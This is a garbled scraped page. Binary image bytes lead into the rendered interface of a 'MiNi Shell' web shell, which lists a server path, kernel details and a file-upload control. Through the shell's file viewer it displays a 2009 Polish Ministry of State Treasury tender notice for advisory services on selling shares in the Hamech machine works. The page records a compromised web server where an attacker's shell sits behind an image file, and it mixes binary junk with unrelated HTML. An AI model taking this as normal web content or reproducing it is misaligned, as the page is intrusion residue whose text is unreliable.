JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090508/139740-N-2009.html

<p class="kh_header"><b>Warszawa: Świadczenie usług dla Ministra Skarbu Państwa w procesie sprzedaży udziałów Spółki Zakłady Maszynowe Hamech Spółka z ograniczoną odpowiedzialnością z siedzibą w Hajnówce</b><br>
<b>Numer ogłoszenia: 139740 - 2009; data zamieszczenia: 08.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Skarbu Państwa , ul. Krucza 36/Wspólna 6, 00-522 Warszawa, woj. mazowieckie, tel. 022 6958719, faks 022 6958935.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msp.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług dla Ministra Skarbu Państwa w procesie sprzedaży udziałów Spółki Zakłady Maszynowe Hamech Spółka z ograniczoną odpowiedzialnością z siedzibą w Hajnówce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług dla Ministra Skarbu Państwa w procesie sprzedaży udziałów Spółki Zakłady Maszynowe Hamech Spółka z ograniczoną odpowiedzialnością z siedzibą w Hajnówce (zwanej dalej Spółką), tj. przygotowanie niezbędnych analiz Spółki, sporządzenie memorandum informacyjnego Spółki zwanych dalej Zamówionymi Dziełami (FAZA I) oraz, jeżeli ZAMAWIAJĄCY uzna to za potrzebne, doradztwo w procesie zbywania udziałów Spółki przez Skarb Państwa zwanych dalej Zleconymi Pracami (FAZA II). 
 
2.	Szczegółowy opis przedmiotu zamówienia: 

2.1. Faza I - wykonanie Zamówionych Dzieł obejmujących:

2.1.1.	ustalenie sytuacji prawnej majątku Spółki (zwane dalej analizą sytuacji prawnej majątku Spółki);
2.1.2.	(opcja) ocenę realizacji obowiązków Spółki wynikających z tytułu wymagań ochrony środowiska  (zwaną dalej analizą realizacji obowiązków wynikających z tytułu wymagań ochrony środowiska);
2.1.3.	(opcja) ustalenie stanu i perspektyw rozwoju przedsiębiorstwa Spółki (zwane dalej analizą stanu i perspektyw rozwoju przedsiębiorstwa Spółki);
2.1.4.	oszacowanie wartości Spółki, przy użyciu co najmniej dwóch metod wyceny;
2.1.5.	sporządzenie memorandum informacyjnego Spółki, zgodnie z wymogami obowiązującego prawa;
2.1.6.	(opcja) przetłumaczenie przez tłumacza przysięgłego na język angielski memorandum informacyjnego Spółki, o którym mowa w ppkt. 2.1.5.

 na pisemne żądanie ZAMAWIAJĄCEGO i w terminie wyznaczonym przez ZAMAWIAJĄCEGO. 
2.2.  Faza II - (OPCJA)  - na pisemne  żądanie ZAMAWIAJĄCEGO i  w terminie   wyznaczonym przez ZAMAWIAJĄCEGO  wykonanie  wszystkich  lub niektórych spośród wymienionych poniżej Zleconych Prac:

2.2.1. przygotowanie i obsługę procesu zbywania osobom trzecim udziałów Spółki w trybie negocjacji podjętych na podstawie publicznego zaproszenia, a w szczególności przygotowanie i zamieszczenie na koszt Wykonawcy ogłoszenia o zbyciu udziałów przygotowanie procedury ich zbycia, identyfikację, selekcję potencjalnych Nabywców, badanie ich wiarygodności finansowej, a także doradztwo w negocjacjach dotyczących sprzedaży udziałów, przygotowanie projektu umowy sprzedaży udziałów, z uwzględnieniem wskazówek Zamawiającego i doprowadzenie do jej zawarcia oraz wejścia w życie;
2.2.2.  doradztwo na rzecz ZAMAWIAJĄCEGO - w okresie nie krótszym niż do wykonania wszystkich zobowiązań Nabywcy zawartych w umowie sprzedaży udziałów Spółki i nie dłuższym niż termin obowiązywania umowy, o którym mowa w § 18 Umowy - przy wprowadzaniu ewentualnych zmian w Umowie sprzedaży udziałów Spółki oraz przy dokonywaniu interpretacji postanowień tej Umowy, a także przy prowadzeniu negocjacji w celu polubownego rozstrzygnięcia sporów wynikłych w związku z wykonywaniem umowy sprzedaży udziałów Spółki przed skierowaniem sprawy na drogę sądową;
2.2.3. doradztwo przy sprzedaży kolejnych udziałów Spółki zgodnie z Ustawą o komercjalizacji i prywatyzacji.

ZAMAWIAJĄCY ustalił, że użyte powyżej określenie na pisemne żądanie ZAMAWIAJĄCEGO i w terminie wyznaczonym przez ZAMAWIAJĄCEGO należy rozumieć w ten sposób, że ZAMAWIAJĄCY w formie pisemnej wyznaczy dzień rozpoczęcia wykonania Zamówionego Dzieła lub Zleconych Prac a w odniesieniu do Zamówionych Dzieł, o którym mowa w ppkt. 2.1.2., 2.1.3. i 2.1.6. oraz do Zleconych Prac będzie to równoznaczne ze złożeniem oświadczenia o skorzystaniu z opcji w zakresie określonym w piśmie.
ZAMAWIAJĄCY zastrzega sobie prawo nie wykorzystania wszystkich opcji, o których mowa w ppkt. 2.1.2., 2.1.3. i 2.1.6. oraz pkt. 2.2. lub uprawnień wskazanych w przedmiocie zamówienia.
Szczegółowy zakres oraz warunki jakim powinien odpowiadać przedmiot zamówienia i jego wykonanie określone są w projekcie umowy (projekt umowy, której zawarcia oczekuje ZAMAWIAJĄCY od WYKONAWCY stanowi ZAŁĄCZNIK NR 5 do SIWZ), zwanej dalej Umową.

W ramach wynagrodzenia za Zamówione Dzieła, na pisemne żądanie ZAMAWIAJĄCEGO zgłoszone przez ZAMAWIAJĄCEGO w terminie nie przekraczającym terminu obowiązywania Umowy, WYKONAWCA zobowiązany jest do dokonania: 
- 	jednokrotnej bezpłatnej aktualizacji Zamówionego Dzieła, o którym mowa  w ppkt. 2.1.1.;
-	dwukrotnej bezpłatnej aktualizacji Zamówionych Dzieł, o których mowa  w ppkt  2.1.5. i ppkt. 2.1.6.;
-	trzykrotnej bezpłatnej aktualizacji Zamówionego Dzieła, o którym mowa w ppkt.  2.1.4.
 Aktualizacja Zamówionych Dzieł winna dotyczyć stanu faktycznego i prawnego na dzień jej sporządzenia lub inny dzień w przypadkach uzasadnionych i za pisemną zgodą ZAMAWIAJĄCEGO, z  zachowaniem warunków sporządzania Zamówionych Dzieł, o których mowa w Załączniku Nr 2 do Umowy. 

Za kolejne aktualizacje Zamówionych Dzieł, o których mowa w ppkt. 2.1.4.-2.1.6. WYKONAWCY będzie przysługiwało 10% wynagrodzenia za Zamówione Dzieła, o którym mowa  w § 3 ust. 1 pkt. 1.4.-1.6. Umowy. 
Za drugą aktualizację Zamówionego Dzieła, o którym mowa w ppkt. 2.1.1. WYKONAWCY będzie przysługiwało 20 % wynagrodzenia za Zamówione Dzieło, o którym mowa w § 3 ust. 1 pkt.  1.1. Za każdą kolejną aktualizację Zamówionego Dzieła, o którym mowa w ppkt. 2.1.1. WYKONAWCY będzie przysługiwało 100 % wynagrodzenia za Zamówione Dzieło, o którym mowa w § 3 ust. 1 pkt.  1.1.
Za aktualizacje Zamówionych Dzieł, o których mowa w ppkt. 2.1.2.-2.1.3. WYKONAWCY będzie przysługiwało 100 % wynagrodzenia za Zamówione Dzieła, o którym mowa w § 3 ust. 1 pkt.  1.2.-1.3. Umowy. 

Przy wykonaniu, odbiorze oraz wypłacie wynagrodzenia za kolejne aktualizacje Zamówionych Dzieł zastosowanie mają odpowiednie postanowienia Umowy dotyczące Zamówionych Dzieł oraz terminu jej obowiązywania, o którym mowa § 18 Umowy. Ponadto wykonane Zamówione Dzieła powinny być przekazane ZAMAWIAJĄCEMU na nośnikach elektronicznych umożliwiających ich wykorzystanie przez ZAMAWIAJĄCEGO w formie innej niż zapis na papierze.

Zamówione Dzieła, o których mowa w pkt.  2.1.  powinny być opracowane w formie pisemnej i powinny uwzględniać stan faktyczny i prawny na dzień ich sporządzenia lub inny dzień w przypadkach uzasadnionych i za pisemną zgodą ZAMAWIAJĄCEGO lub na jego żądanie oraz zawierać wynikające z nich wnioski. 

Do Zamówionych Dzieł należy dołączyć w formie ponumerowanych załączników oryginały, odpisy lub kserokopie dokumentów stanowiących podstawę ich wykonania potwierdzone za zgodność z oryginałem przez osobę uprawnioną (osoby uprawnione) do reprezentacji WYKONAWCY. 

Do sporządzonych Zamówionych Dzieł określonych w pkt. 2.1. ppkt. 2.1.1. - 2.1.3, 2.1.5. i 2.1.6. oraz do sporządzonych aktualizacji Zamówionych Dzieł, WYKONAWCA powinien dołączyć pisemne oświadczenie Zarządu Spółki o zgodności informacji w nich zawartych ze stanem faktycznym lub wyjaśnić przyczynę braku takiego oświadczenia.

WYKONAWCA jest ponadto zobowiązany do informowania ZAMAWIAJĄCEGO o zmianach prawa lub wystąpieniu innych istotnych zdarzeń mających wpływ na sytuację Spółki.

Wszystkie przekazywane ZAMAWIAJĄCEMU przez WYKONAWCĘ w ramach wykonania Umowy Zamówione Dzieła mają być podpisane i opieczętowane na każdej stronie pieczęcią WYKONAWCY i parafami osób reprezentujących WYKONAWCĘ wraz z zaznaczeniem wersja z dnia .... oraz według stanu na dzień .....


3.Wykonawca może powierzyć wykonanie zamówienia podwykonawcom..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.40.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona przez cały okres związania ofertą wadium    w wysokości: 6 000,00 zł (słownie: sześć tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą się ubiegać WYKONAWCY, którzy spełniają poniższe warunki:
1.1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

1.2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia co oznacza, że: 

1.2.1.WYKONAWCA dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia przy czym: 1) co najmniej dwie osoby posiadają wykształcenie prawnicze oraz doświadczenie w zakresie wykonania analizy sytuacji prawnej majątku spółki lub audytu prawnego przedsiębiorstwa, przy czym co najmniej jedna z nich posiada uprawnienia radcy prawnego, 2) co najmniej dwie osoby posiadają doświadczenie w zakresie wykonania oszacowania wartości przedsiębiorstwa spółki, 3) co najmniej dwie osoby posiadają uprawnienia do sporządzania operatów szacunkowych, 4) co najmniej jedna osoba posiada uprawnienia biegłego rewidenta, 5) co najmniej jedna osoba doprowadziła samodzielnie lub wraz ze sprzedawcą do zawarcia umowy sprzedaży osobom trzecim akcji/udziałów spółki, przy czym wartość przeprowadzonej transakcji nie była mniejsza niż 1 500 000  złotych netto (słownie: milion pięćset tysięcy złotych netto).

1.2.2.WYKONAWCA wykonał należycie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia - a jeżeli okres prowadzenia działalności jest krótszy w tym okresie - co najmniej 3 wyceny podmiotu zbywanego i doprowadził samodzielnie lub wraz ze sprzedawcą do zawarcia umowy sprzedaży osobom trzecim akcji/udziałów spółki, przy czym wartość transakcji nie była mniejsza niż 1 500 000  złotych netto (słownie: milion pięćset tysięcy złotych netto).

1.2.3. WYKONAWCA realizujący prace związane z dostępem do informacji niejawnych musi zatrudniać pełnomocnika do spraw ochrony informacji niejawnych spełniającego wymagania określone w przepisach Ustawy z dnia 22 stycznia 1999 r. o ochronie informacji niejawnych (Dz. U. z 2005 r. Nr 196, poz. 1631 ze zm.);

1.3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia, co oznacza, iż WYKONAWCA:

1.3.1. posiada środki finansowe na rachunku lub zdolność kredytową w wysokości nie mniejszej niż 200 000,00 złotych (słownie: dwieście  tysięcy złotych);
1.3.2. jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 200 000,00 złotych (słownie: dwieście  tysięcy złotych).

  1.4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na   podstawie art. 24 Ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy - według wzoru ZAŁĄCZNIK NR 1 do SIWZ.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 odpowiednio pkt. 4 - 8 Ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 Ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że WYKONAWCA nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.	Wykaz wykonanych usług, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie według wzoru stanowiącego ZAŁĄCZNIK NR 2 do SIWZ.
7.	Wykaz osób, którymi dysponuje lub będzie dysponował WYKONAWCA i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - według wzoru ZAŁĄCZNIK NR 3 do SIWZ
8.	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 7 WYKONAWCA wskazał osoby, którymi będzie dysponował.
9.	Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym WYKONAWCA posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową WYKONAWCY, wystawionej nie wcześniej niż  trzy miesiące przed upływem terminu składania ofert. Z informacji musi wynikać konkretna kwota w PLN posiadanych środków finansowych lub wysokość zdolności kredytowej w PLN.
10.	Polisa, a w przypadku jej braku inny dokument potwierdzający, że WYKONAWCA jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
11.	Dokumenty stwierdzające, posiadanie pełnomocnika do spraw ochrony informacji niejawnych spełniającego wymagania Ustawy z dnia 22 stycznia 1999 r. o ochronie informacji niejawnych tj. kserokopie poświadczenia bezpieczeństwa i zaświadczenia o odbyciu przeszkolenia przez służbę ochrony państwa, kserokopię dokumentu potwierdzającego powierzenie tej osobie pełnienia takiej funkcji.
12.	Wykonawcy wspólnie ubiegający się o zamówienie publiczne w celu spełnienia warunków udziału w postępowaniu składają:
a)	każdy z Wykonawców - dokument wymieniony w pkt. 1-5;
b)	dokumenty potwierdzające spełnienie warunków w pkt. 6-11 - wspólnie;
c)	pełnomocnictwo wskazujące zakres czynności, do których umocowany jest pełnomocnik..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.msp.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MINISTERSTWO SKARBU PAŃSTWA ul. Krucza 36/Wspólna 6 00-522 Warszawa pok. 223.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2009 godzina 10:00, miejsce: MINISTERSTWO SKARBU PAŃSTWA ul. Krucza 36/Wspólna 6 00-522 Warszawa pok. 223.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com